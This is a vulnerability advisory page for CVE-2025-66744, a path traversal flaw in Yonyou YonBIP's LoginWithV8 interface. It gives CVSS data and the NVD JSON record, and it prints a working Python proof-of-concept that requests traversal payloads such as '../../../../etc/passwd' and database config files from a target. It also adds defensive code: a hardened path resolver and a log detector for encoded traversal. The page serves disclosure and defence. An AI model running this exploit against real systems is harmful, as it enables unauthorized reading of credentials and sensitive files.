Security Vulnerability Report
CVE-2025-66744 CVSS 7.5 HIGH

CVE-2025-66744

Published: 2026-01-09 17:15:53
Last Modified: 2026-04-15 00:35:42

Description

In Yonyou YonBIP v3 and before, the LoginWithV8 interface in the series data application service system is vulnerable to path traversal, allowing unauthorized access to sensitive information within the system. The NVD record classifies the weakness as CWE-22 (Improper Limitation of a Pathname to a Restricted Directory), and the vector below (PR:N, UI:N, C:H, I:N, A:N) records it as an unauthenticated, read-only file disclosure: no login or user interaction is required, and the impact is to confidentiality only.
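As an added illustration of the weakness class behind this advisory (CWE-22), and not code from Yonyou, from the advisory, or from the referenced PoC repository, the following Python shows the unsafe join beside a hardened resolver. The document root and the idea that the interface takes a relative file name from the request are assumptions for the example; the real YonBIP directory layout and parameter name are not given on this page.

```python
import os
from urllib.parse import unquote

# Hypothetical document root; the real YonBIP layout is not known from the advisory.
DOC_ROOT = "/srv/yonbip/data"


def vulnerable_resolve(root, requested):
    """CWE-22 pattern: the request value is joined onto the root with no
    validation, so '../' segments walk out of the intended directory."""
    return os.path.normpath(os.path.join(root, requested))


def escapes_root(root, requested):
    """True when the vulnerable join would land outside root (what an
    attacker's '../../../../etc/passwd' achieves against the unsafe form)."""
    root_real = os.path.realpath(root)
    target = vulnerable_resolve(root_real, requested)
    return os.path.commonpath([root_real, target]) != root_real


def safe_resolve(root, requested):
    """Return the absolute path to serve, or None if the request escapes root.

    Defences, in order:
      1. percent-decode twice so %2e%2e%2f and %252e%252e%252f are both seen;
      2. reject NUL bytes, which can truncate the path in native file APIs;
      3. treat backslashes as separators (a Windows host honours '..\\');
      4. strip leading separators so an absolute path cannot replace root;
      5. canonicalise with realpath and require the result to stay under root.
    """
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        return None
    decoded = decoded.replace("\\", "/").lstrip("/")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, decoded))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


if __name__ == "__main__":
    # Inputs constructed for the example; the first three are the PoC's own payload shapes.
    for req in ("../../../../etc/passwd",
                "%2e%2e%2f%2e%2e%2fwebapps%2fROOT%2fWEB-INF%2fclasses%2fdb.properties",
                "..\\..\\..\\..\\windows\\win.ini",
                "reports/q1.csv"):
        print(f"{req!r:70} unsafe-escapes={escapes_root(DOC_ROOT, req)!s:5} "
              f"safe={safe_resolve(DOC_ROOT, req)}")
```

The check that matters is the final `commonpath` comparison on the canonicalised path; the decoding and separator normalisation before it only exist so that the comparison sees the same path the file system would. A deny-list of `..` substrings alone would miss encoded and backslash variants.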

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No structured configuration (CPE) data is available in the NVD record.

Affected versions as stated by the reporter: Yonyou YonBIP v3 and all earlier versions.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests

# CVE-2025-66744 PoC - Yonyou YonBIP LoginWithV8 Path Traversal
# Target: Yonyou YonBIP v3 and before


def exploit_path_traversal(target_url):
    """
    Exploit CVE-2025-66744: Path Traversal in LoginWithV8 interface
    """
    # Common sensitive files to check (Windows and Linux hosts, then
    # application config and log files relative to a Tomcat-style layout)
    sensitive_files = [
        '../../../../windows/win.ini',
        '../../../../etc/passwd',
        '../../../webapps/ROOT/WEB-INF/classes/db.properties',
        '../../../config/database.yml',
        '../../../logs/application.log',
    ]

    print(f"[*] Target: {target_url}")
    print("[*] Exploiting CVE-2025-66744 - Path Traversal in LoginWithV8\n")

    for file_path in sensitive_files:
        try:
            # Construct the malicious URL
            exploit_url = f"{target_url}/LoginWithV8?file={file_path}"
            print(f"[*] Testing: {file_path}")

            # verify=False: the PoC ignores TLS certificate errors on the target
            response = requests.get(exploit_url, timeout=10, verify=False)

            # Note: any HTTP 200 with a non-empty body counts as success here,
            # so a normal login page response would also satisfy this check.
            if response.status_code == 200 and len(response.content) > 0:
                print("[+] SUCCESS! Retrieved file content:")
                print(response.text[:500])
                print("-" * 50)
                return True
            else:
                print(f"[-] Failed (Status: {response.status_code})")
        except requests.exceptions.RequestException as e:
            print(f"[-] Request error: {e}")

    return False


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-66744.py <target_url>")
        print("Example: python cve-2025-66744.py http://target.com")
        sys.exit(1)

    target = sys.argv[1].rstrip('/')
    exploit_path_traversal(target)
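The following detection example is added here and is not part of the advisory or of the PoC above. It runs over constructed combined-format access-log lines (not real traffic) that mirror the PoC's payload shapes in plain, single-encoded, double-encoded and backslash forms, assumes the web server logs the request target before percent-decoding, and uses the `file` parameter name from the PoC, which is the PoC's assumption rather than a vendor-confirmed name.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed access-log lines in Apache/Nginx combined format (not real traffic).
# Targets mirror the PoC's payloads; the 'file' parameter is the PoC's assumption.
SAMPLE_LOG = [
    '203.0.113.10 - - [09/Jan/2026:17:20:01 +0000] "GET /LoginWithV8?file=../../../../etc/passwd HTTP/1.1" 200 1834',
    '203.0.113.10 - - [09/Jan/2026:17:20:03 +0000] "GET /LoginWithV8?file=%2e%2e%2f%2e%2e%2fwebapps%2fROOT%2fWEB-INF%2fclasses%2fdb.properties HTTP/1.1" 200 512',
    '198.51.100.7 - - [09/Jan/2026:17:21:11 +0000] "GET /LoginWithV8?file=%252e%252e%252fwindows%252fwin.ini HTTP/1.1" 404 0',
    '192.0.2.44 - - [09/Jan/2026:17:22:30 +0000] "POST /LoginWithV8 HTTP/1.1" 200 210',
    '192.0.2.45 - - [09/Jan/2026:17:23:00 +0000] "GET /static/app.js HTTP/1.1" 200 9981',
    '192.0.2.9 - - [09/Jan/2026:17:24:45 +0000] "GET /static/..%2f..%2fWEB-INF/web.xml HTTP/1.1" 403 0',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)
# '../' or '..\' after decoding; the backslash form matters for Windows-hosted targets.
TRAVERSAL_RE = re.compile(r'\.\.(/|\\)')


def decode_target(target):
    """Percent-decode twice so single- and double-encoded traversal both surface."""
    return unquote(unquote(target))


def scan_access_log(lines):
    """Return one record per request whose decoded target contains a traversal
    sequence. Each record flags whether the request hit the LoginWithV8 endpoint
    and whether the response looks like a successful read (200 with a body)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        decoded = decode_target(m["target"])
        if not TRAVERSAL_RE.search(decoded):
            continue
        endpoint = decoded.split("?", 1)[0]
        size = 0 if m["bytes"] == "-" else int(m["bytes"])
        hits.append({
            "ip": m["ip"],
            "timestamp": m["ts"],
            "endpoint": endpoint,
            "decoded_target": decoded,
            "status": int(m["status"]),
            "likely_success": m["status"] == "200" and size > 0,
            "cve_2025_66744": endpoint.endswith("/LoginWithV8"),
        })
    return hits


def attempts_by_ip(hits):
    """Count flagged requests per source address, for blocking or triage."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for h in found:
        tag = "CVE-2025-66744" if h["cve_2025_66744"] else "traversal"
        state = "SUCCESS?" if h["likely_success"] else "attempt"
        print(f'{h["timestamp"]} {h["ip"]} {tag} {state} {h["decoded_target"]}')
    print(attempts_by_ip(found))
```

The "likely success" flag inherits the PoC's weakness from the other side: a 200 with a body is only a hint, since the login interface may answer 200 to anything. Treat a 200 against LoginWithV8 with a traversal payload as a confirmed read only after checking the response size against the expected file or pulling the response from a proxy capture.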

References

https://github.com/iSee857/YonYouBip-path-travel (the only reference carried in the NVD record below)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-66744",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-09T17:15:52.927",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In Yonyou YonBIP v3 and before, the LoginWithV8 interface in the series data application service system is vulnerable to path traversal, allowing unauthorized access to sensitive information within the system"
      },
      {
        "lang": "es",
        "value": "En Yonyou YonBIP v3 y versiones anteriores, la interfaz LoginWithV8 en el sistema de servicio de aplicaciones de datos de series es vulnerable a salto de ruta, lo que permite el acceso no autorizado a información sensible dentro del sistema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/iSee857/YonYouBip-path-travel",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/iSee857/YonYouBip-path-travel",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}